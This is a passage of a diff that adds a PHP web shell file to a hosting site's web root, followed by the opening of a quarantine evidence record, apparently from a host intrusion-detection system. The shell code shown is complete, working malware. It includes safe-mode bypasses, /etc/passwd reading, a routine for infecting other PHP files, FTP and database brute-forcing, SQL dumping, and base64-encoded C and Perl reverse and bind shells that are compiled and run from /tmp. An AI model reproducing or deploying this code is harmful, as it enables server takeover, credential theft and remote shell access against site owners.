'; + hardFooter(); +} +function actionFilesMan() { + if (!empty ($_COOKIE['f'])) + $_COOKIE['f'] = @unserialize($_COOKIE['f']); + if(!empty($_POST['p1'])) { + switch($_POST['p1']) { + case 'uploadFile': + if ( is_array($_FILES['f']['tmp_name']) ) { + foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) { + if(!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) { + echo "Can't upload file!"; + } + } + } + break; + case 'mkdir': + if(!@mkdir($_POST['p2'])) + echo "Can't create new dir"; + break; + case 'delete': + function deleteDir($path) { + $path = (substr($path,-1)=='/') ? $path:$path.'/'; + $dh = opendir($path); + while ( ($â–Ÿ = readdir($dh) ) !== false) { + $â–Ÿ = $path.$â–Ÿ; + if ( (basename($â–Ÿ) == "..") || (basename($â–Ÿ) == ".") ) + continue; + $type = filetype($â–Ÿ); + if ($type == "dir") + deleteDir($â–Ÿ); + else + @unlink($â–Ÿ); + } + closedir($dh); + @rmdir($path); + } + if(is_array(@$_POST['f'])) + foreach($_POST['f'] as $f) { + if($f == '..') + continue; + $f = urldecode($f); + if(is_dir($f)) + deleteDir($f); + else + @unlink($f); + } + break; + case 'paste': + if($_COOKIE['act'] == 'copy') { + function copy_paste($c,$s,$d){ + if(is_dir($c.$s)){ + mkdir($d.$s); + $h = @opendir($c.$s); + while (($f = @readdir($h)) !== false) + if (($f != ".") and ($f != "..")) + copy_paste($c.$s.'/',$f, $d.$s.'/'); + } elseif(is_file($c.$s)) + @copy($c.$s, $d.$s); + } + foreach($_COOKIE['f'] as $f) + copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); + } elseif($_COOKIE['act'] == 'move') { + function move_paste($c,$s,$d){ + if(is_dir($c.$s)){ + mkdir($d.$s); + $h = @opendir($c.$s); + while (($f = @readdir($h)) !== false) + if (($f != ".") and ($f != "..")) + copy_paste($c.$s.'/',$f, $d.$s.'/'); + } elseif(@is_file($c.$s)) + @copy($c.$s, $d.$s); + } + foreach($_COOKIE['f'] as $f) + @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); + } elseif($_COOKIE['act'] == 'zip') { + if(class_exists('ZipArchive')) { + $zip = new ZipArchive(); + if ($zip->open($_POST['p2'], 1)) { + chdir($_COOKIE['c']); + foreach($_COOKIE['f'] as $f) { + if($f == '..') + continue; + if(@is_file($_COOKIE['c'].$f)) + $zip->addFile($_COOKIE['c'].$f, $f); + elseif(@is_dir($_COOKIE['c'].$f)) { + $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS)); + foreach ($iterator as $key=>$value) { + $zip->addFile(realpath($key), $key); + } + } + } + chdir($GLOBALS['cwd']); + $zip->close(); + } + } + } elseif($_COOKIE['act'] == 'unzip') { + if(class_exists('ZipArchive')) { + $zip = new ZipArchive(); + foreach($_COOKIE['f'] as $f) { + if($zip->open($_COOKIE['c'].$f)) { + $zip->extractTo($GLOBALS['cwd']); + $zip->close(); + } + } + } + } elseif($_COOKIE['act'] == 'tar') { + chdir($_COOKIE['c']); + $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); + ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); + chdir($GLOBALS['cwd']); + } + unset($_COOKIE['f']); + setcookie('f', '', time() - 3600); + break; + default: + if(!empty($_POST['p1'])) { + prototype('act', $_POST['p1']); + prototype('f', serialize(@$_POST['f'])); + prototype('c', @$_POST['c']); + } + break; + } + } + hardHeader(); + echo '

File manager

'; + $dirContent = hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); + if($dirContent === false) { echo 'Can\'t open this folder!';hardFooter(); return; } + global $sort; + $sort = array('name', 1); + if(!empty($_POST['p1'])) { + if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) + $sort = array($match[1], (int)$match[2]); + } +echo " + +"; + $dirs = $files = array(); + $n = count($dirContent); + for($i=0;$i<$n;$i++) { + $ow = @posix_getpwuid(@fileowner($dirContent[$i])); + $gr = @posix_getgrgid(@filegroup($dirContent[$i])); + $tmp = array('name' => $dirContent[$i], + 'path' => $GLOBALS['cwd'].$dirContent[$i], + 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), + 'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]), + 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), + 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), + 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) + ); + if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) + $files[] = array_merge($tmp, array('type' => 'file')); + elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) + $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); + elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&&($dirContent[$i] != ".")) + $dirs[] = array_merge($tmp, array('type' => 'dir')); + } + $GLOBALS['sort'] = $sort; + function cmp($a, $b) { + if($GLOBALS['sort'][0] != 'size') + return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); + else + return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); + } + usort($files, "cmp"); + usort($dirs, "cmp"); + $files = array_merge($dirs, $files); + $l = 0; + foreach($files as $f) { + echo ''; + $l = $l?0:1; + } + echo "
NameSizeModifyOwner/GroupPermissionsActions
'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '>[ ' . htmlspecialchars($f['name']) . ' ]').''.(($f['type']=='file')?viewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms'] + .'R T'.(($f['type']=='file')?' F E D':'').'
+ + + + + "; + if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) + echo " file name:  "; + echo "
"; + hardFooter(); +} +function actionStringTools() { + if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} + if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} + if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i 'base64_encode', + 'Base64 decode' => 'base64_decode', + 'Url encode' => 'urlencode', + 'Url decode' => 'urldecode', + 'Full urlencode' => 'full_urlencode', + 'md5 hash' => 'md5', + 'sha1 hash' => 'sha1', + 'crypt' => 'crypt', + 'CRC32' => 'crc32', + 'ASCII to HEX' => 'ascii2hex', + 'HEX to ASCII' => 'hex2ascii', + 'HEX to DEC' => 'hexdec', + 'HEX to BIN' => 'hex2bin', + 'DEC to HEX' => 'dechex', + 'DEC to BIN' => 'decbin', + 'BIN to HEX' => 'binhex', + 'BIN to DEC' => 'bindec', + 'String to lower case' => 'strtolower', + 'String to upper case' => 'strtoupper', + 'Htmlspecialchars' => 'htmlspecialchars', + 'String length' => 'strlen', + ); + if(isset($_POST['ajax'])) { + prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); + ob_start(); + if(in_array($_POST['p1'], $stringTools)) + echo $_POST['p1']($_POST['p2']); + $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; + echo strlen($temp), "\n", $temp; + exit; + } + if(empty($_POST['ajax'])&&!empty($_POST['p1'])) + prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); + hardHeader(); + echo '

String conversions

'; + echo "
send using AJAX
";
+	if(!empty($_POST['p1'])) {
+		if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
+	}
+	echo"

Search files:

+
+ + + + +
Text:
Path:
Name:
"; + function hardRecursiveGlob($path) { + if(substr($path, -1) != '/') + $path.='/'; + $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); + if(is_array($paths)&&@count($paths)) { + foreach($paths as $â–Ÿ) { + if(@is_dir($â–Ÿ)){ + if($path!=$â–Ÿ) + hardRecursiveGlob($â–Ÿ); + } else { + if(empty($_POST['p2']) || @strpos(file_get_contents($â–Ÿ), $_POST['p2'])!==false) + echo "".htmlspecialchars($â–Ÿ)."
"; + } + } + } + } + if(@$_POST['p3']) + hardRecursiveGlob($_POST['c']); + echo "

Search for hash:

+
+
+ +
+
+
+
+
+
+
+
"; + hardFooter(); +} +function actionSafeMode() { + $temp=''; + ob_start(); + switch($_POST['p1']) { + case 1: + $temp=@tempnam($test, 'cx'); + if(@copy("compress.zlib://".$_POST['p2'], $temp)){ + echo @file_get_contents($temp); + unlink($temp); + } else + echo 'Sorry... Can\'t open file'; + break; + case 2: + $files = glob($_POST['p2'].'*'); + if( is_array($files) ) + foreach ($files as $filename) + echo $filename."\n"; + break; + case 3: + $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH); + curl_exec($ch); + break; + case 4: + ini_restore("safe_mode"); + ini_restore("open_basedir"); + include($_POST['p2']); + break; + case 5: + for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { + $uid = @posix_getpwuid($_POST['p2']); + if ($uid) + echo join(':',$uid)."\n"; + } + break; + case 6: + if(!function_exists('imap_open'))break; + $stream = imap_open($_POST['p2'], "", ""); + if ($stream == FALSE) + break; + echo imap_body($stream, 1); + imap_close($stream); + break; + } + $temp = ob_get_clean(); + hardHeader(); + echo '

Safe mode bypass

'; + echo 'Copy (read file)

Glob (list dir)

Curl (read file)

Ini_restore (read file)

Posix_getpwuid ("Read" /etc/passwd)
From
To


Imap_open (read file)
'; + if($temp) + echo '
'.$temp.'
'; + echo '
'; + hardFooter(); +} +function actionLogout() { + setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); + die('bye!'); +} +function actionSelfRemove() { + if($_POST['p1'] == 'yes') + if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) + die('Shell has been removed'); + else + echo 'unlink error!'; + if($_POST['p1'] != 'yes') + hardHeader(); + echo '

Suicide

Really want to remove the shell?
Yes
'; + hardFooter(); +} +function actionInfect() { + hardHeader(); + echo '

Infect

'; + if($_POST['p1'] == 'infect') { + $target=$_SERVER['DOCUMENT_ROOT']; + function ListFiles($dir) { + if($dh = opendir($dir)) { + $files = Array(); + $inner_files = Array(); + while($file = readdir($dh)) { + if($file != "." && $file != "..") { + if(is_dir($dir . "/" . $file)) { + $inner_files = ListFiles($dir . "/" . $file); + if(is_array($inner_files)) $files = array_merge($files, $inner_files); + } else { + array_push($files, $dir . "/" . $file); + } + } + } + closedir($dh); + return $files; + } + } + foreach (ListFiles($target) as $key=>$file){ + $nFile = substr($file, -4, 4); + if($nFile == ".php" ){ + if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){ + echo "$file
"; + $i++; + } + } + } + echo "$i"; + }else{ + echo "
"; + echo 'Really want to infect the server? Yes
'; + } + hardFooter(); +} +function actionBruteforce() { + hardHeader(); + if( isset($_POST['proto']) ) { + echo '

Results

Type: '.htmlspecialchars($_POST['proto']).' Server: '.htmlspecialchars($_POST['server']).'
'; + if( $_POST['proto'] == 'ftp' ) { + function bruteForce($ip,$port,$login,$pass) { + $fp = @ftp_connect($ip, $port?$port:21); + if(!$fp) return false; + $res = @ftp_login($fp, $login, $pass); + @ftp_close($fp); + return $res; + } + } elseif( $_POST['proto'] == 'mysql' ) { + function bruteForce($ip,$port,$login,$pass) { + $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass); + @mysql_close($res); + return $res; + } + } elseif( $_POST['proto'] == 'pgsql' ) { + function bruteForce($ip,$port,$login,$pass) { + $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres"; + $res = @pg_connect($str); + @pg_close($res); + return $res; + } + } + $success = 0; + $attempts = 0; + $server = explode(":", $_POST['server']); + if($_POST['type'] == 1) { + $temp = @file('/etc/passwd'); + if( is_array($temp) ) + foreach($temp as $line) { + $line = explode(":", $line); + ++$attempts; + if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { + $success++; + echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
'; + } + if(@$_POST['reverse']) { + $tmp = ""; + for($i=strlen($line[0])-1; $i>=0; --$i) + $tmp .= $line[0][$i]; + ++$attempts; + if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { + $success++; + echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($tmp); + } + } + } + } elseif($_POST['type'] == 2) { + $temp = @file($_POST['dict']); + if( is_array($temp) ) + foreach($temp as $line) { + $line = trim($line); + ++$attempts; + if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) { + $success++; + echo ''.htmlspecialchars($_POST['login']).':'.htmlspecialchars($line).'
'; + } + } + } + echo "Attempts: $attempts Success: $success

"; + } + echo '

FTP bruteforce

' + .'' + .'' + .'' + .'' + .'' + .'' + .'
Type
' + .'' + .'' + .'' + .'' + .'Server:port
Brute type /etc/passwd
reverse (login -> nigol)
Dictionary
' + .'' + .'' + .'
Login
Dictionary
' + .'
'; + echo '
'; + hardFooter(); +} +function actionSql() { + class DbClass { + var $type; + var $link; + var $res; + function DbClass($type) { + $this->type = $type; + } + function connect($host, $user, $pass, $dbname){ + switch($this->type) { + case 'mysql': + if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; + break; + case 'pgsql': + $host = explode(':', $host); + if(!$host[1]) $host[1]=5432; + if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; + break; + } + return false; + } + function selectdb($db) { + switch($this->type) { + case 'mysql': + if (@mysql_select_db($db))return true; + break; + } + return false; + } + function query($str) { + switch($this->type) { + case 'mysql': + return $this->res = @mysql_query($str); + break; + case 'pgsql': + return $this->res = @pg_query($this->link,$str); + break; + } + return false; + } + function fetch() { + $res = func_num_args()?func_get_arg(0):$this->res; + switch($this->type) { + case 'mysql': + return @mysql_fetch_assoc($res); + break; + case 'pgsql': + return @pg_fetch_assoc($res); + break; + } + return false; + } + function listDbs() { + switch($this->type) { + case 'mysql': + return $this->query("SHOW databases"); + break; + case 'pgsql': + return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); + break; + } + return false; + } + function listTables() { + switch($this->type) { + case 'mysql': + return $this->res = $this->query('SHOW TABLES'); + break; + case 'pgsql': + return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); + break; + } + return false; + } + function error() { + switch($this->type) { + case 'mysql': + return @mysql_error(); + break; + case 'pgsql': + return @pg_last_error(); + break; + } + return false; + } + function setCharset($str) { + switch($this->type) { + case 'mysql': + if(function_exists('mysql_set_charset')) + return @mysql_set_charset($str, $this->link); + else + $this->query('SET CHARSET '.$str); + break; + case 'pgsql': + return @pg_set_client_encoding($this->link, $str); + break; + } + return false; + } + function loadFile($str) { + switch($this->type) { + case 'mysql': + return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); + break; + case 'pgsql': + $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '".addslashes($str)."';select file from hard2;"); + $r=array(); + while($i=$this->fetch()) + $r[] = $i['file']; + $this->query('drop table hard2'); + return array('file'=>implode("\n",$r)); + break; + } + return false; + } + function dump($table, $fp = false) { + switch($this->type) { + case 'mysql': + $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); + $create = mysql_fetch_array($res); + $sql = $create[1].";\n"; + if($fp) fwrite($fp, $sql); else echo($sql); + $this->query('SELECT * FROM `'.$table.'`'); + $i = 0; + $head = true; + while($â–Ÿ = $this->fetch()) { + $sql = ''; + if($i % 1000 == 0) { + $head = true; + $sql = ";\n\n"; + } + $columns = array(); + foreach($â–Ÿ as $k=>$v) { + if($v === null) + $â–Ÿ[$k] = "NULL"; + elseif(is_int($v)) + $â–Ÿ[$k] = $v; + else + $â–Ÿ[$k] = "'".@mysql_real_escape_string($v)."'"; + $columns[] = "`".$k."`"; + } + if($head) { + $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $â–Ÿ).')'; + $head = false; + } else + $sql .= "\n\t,(".implode(", ", $â–Ÿ).')'; + if($fp) fwrite($fp, $sql); else echo($sql); + $i++; + } + if(!$head) + if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n"); + break; + case 'pgsql': + $this->query('SELECT * FROM '.$table); + while($â–Ÿ = $this->fetch()) { + $columns = array(); + foreach($â–Ÿ as $k=>$v) { + $â–Ÿ[$k] = "'".addslashes($v)."'"; + $columns[] = $k; + } + $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $â–Ÿ).');'."\n"; + if($fp) fwrite($fp, $sql); else echo($sql); + } + break; + } + return false; + } + }; + $db = new DbClass($_POST['type']); + if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) { + $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); + $db->selectdb($_POST['sql_base']); + switch($_POST['charset']) { + case "Windows-1251": $db->setCharset('cp1251'); break; + case "UTF-8": $db->setCharset('utf8'); break; + case "KOI8-R": $db->setCharset('koi8r'); break; + case "KOI8-U": $db->setCharset('koi8u'); break; + case "cp866": $db->setCharset('cp866'); break; + } + if(empty($_POST['file'])) { + ob_start("ob_gzhandler", 4096); + header("Content-Disposition: attachment; filename=dump.sql"); + header("Content-Type: text/plain"); + foreach($_POST['tbl'] as $v) + $db->dump($v); + exit; + } elseif($fp = @fopen($_POST['file'], 'w')) { + foreach($_POST['tbl'] as $v) + $db->dump($v, $fp); + fclose($fp); + unset($_POST['p2']); + } else + die(''); + } + hardHeader(); + echo " +

Sql browser

+
+ + + + + + + + + +
TypeHostLoginPasswordDatabase
"; + $tmp = ""; + if(isset($_POST['sql_host'])){ + if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { + switch($_POST['charset']) { + case "Windows-1251": $db->setCharset('cp1251'); break; + case "UTF-8": $db->setCharset('utf8'); break; + case "KOI8-R": $db->setCharset('koi8r'); break; + case "KOI8-U": $db->setCharset('koi8u'); break; + case "cp866": $db->setCharset('cp866'); break; + } + $db->listDbs(); + echo "'; + } + else echo $tmp; + }else + echo $tmp; + echo " count the number of rows
+ "; + if(isset($db) && $db->link){ + echo "
"; + if(!empty($_POST['sql_base'])){ + $db->selectdb($_POST['sql_base']); + echo ""; + } + echo "
Tables:

"; + $tbls_res = $db->listTables(); + while($â–Ÿ = $db->fetch($tbls_res)) { + list($key, $value) = each($â–Ÿ); + if(!empty($_POST['sql_count'])) + $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); + $value = htmlspecialchars($value); + echo " ".$value."" . (empty($_POST['sql_count'])?' ':" ({$n['n']})") . "
"; + } + echo "
File path:
"; + if(@$_POST['p1'] == 'select') { + $_POST['p1'] = 'query'; + $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; + $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); + $num = $db->fetch(); + $pages = ceil($num['n'] / 30); + echo "".$_POST['p2']." ({$num['n']} records) Page # "; + echo " of $pages"; + if($_POST['p3'] > 1) + echo " < Prev"; + if($_POST['p3'] < $pages) + echo " Next >"; + $_POST['p3']--; + if($_POST['type']=='pgsql') + $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); + else + $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; + echo "

"; + } + if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { + $db->query(@$_POST['p2']); + if($db->res !== false) { + $title = false; + echo ''; + $line = 1; + while($â–Ÿ = $db->fetch()) { + if(!$title) { + echo ''; + foreach($â–Ÿ as $key => $value) + echo ''; + reset($â–Ÿ); + $title=true; + echo ''; + $line = 2; + } + echo ''; + $line = $line==1?2:1; + foreach($â–Ÿ as $key => $value) { + if($value == null) + echo ''; + else + echo ''; + } + echo ''; + } + echo '
'.$key.'
null'.nl2br(htmlspecialchars($value)).'
'; + } else { + echo '
Error: '.htmlspecialchars($db->error()).'
'; + } + } + echo "

"; + echo "

"; + if($_POST['type']=='mysql') { + $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); + if($db->fetch()) + echo "
Load file
"; + } + if(@$_POST['p1'] == 'loadfile') { + $file = $db->loadFile($_POST['p2']); + echo '
'.htmlspecialchars($file['file']).'
'; + } + } else { + echo htmlspecialchars($db->error()); + } + echo '
'; + hardFooter(); +} +function actionNetwork() { + hardHeader(); + $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; + $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; + $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; + $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; + echo "

Network tools

+
+ Bind port to /bin/sh
+ Port: Password: Using: +
+
+ Back-connect to
+ Server: Port: Using: +

"; + if(isset($_POST['p1'])) { + function cf($f,$t) { + $w=@fopen($f,"w") or @function_exists('file_put_contents'); + if($w) { + @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t)); + @fclose($w); + } + } + if($_POST['p1'] == 'bpc') { + cf("/tmp/bp.c",$bind_port_c); + $â–– = ex("gcc -o /tmp/bp /tmp/bp.c"); + @unlink("/tmp/bp.c"); + $â–– .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &"); + echo "
$â––".ex("ps aux | grep bp")."
"; + } + if($_POST['p1'] == 'bpp') { + cf("/tmp/bp.pl",$bind_port_p); + $â–– = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &"); + echo "
$â––".ex("ps aux | grep bp.pl")."
"; + } + if($_POST['p1'] == 'bcc') { + cf("/tmp/bc.c",$back_connect_c); + $â–– = ex("gcc -o /tmp/bc /tmp/bc.c"); + @unlink("/tmp/bc.c"); + $â–– .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &"); + echo "
$â––".ex("ps aux | grep bc")."
"; + } + if($_POST['p1'] == 'bcp') { + cf("/tmp/bc.pl",$back_connect_p); + $â–– = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &"); + echo "
$â––".ex("ps aux | grep bc.pl")."
"; + } + } + echo '
'; + hardFooter(); +} +if( empty($_POST['a']) ) + if(isset($â–š) && function_exists('action' . $â–š)) + $_POST['a'] = $â–š; + else + $_POST['a'] = 'FilesMan'; +if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) + call_user_func('action' . $_POST['a']); +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/hyjhxp.php.evidence.json b/var/www/hosting/archline.hu/www/hyjhxp.php.evidence.json new file mode 100644 index 0000000..c285f87 --- /dev/null +++ b/var/www/hosting/archline.hu/www/hyjhxp.php.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2884", + "log_excerpt": "[quarantine] www.archline.hu:hyjhxp.php -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/hyjhxp.php)", + "original_sha256": "74656774ceba4d6fb8d69abeeef55ce0a64ac18dab1ac5f6e824e463aa8e9562", + "original_stat": { + "gid": 30037, + "mtime": 1677247504, + "size": 79428, + "uid": 20043 + }, + "rel_path": "hyjhxp.php", + "result": "quarantined", + "timestamp": "20260718T160241Z", + 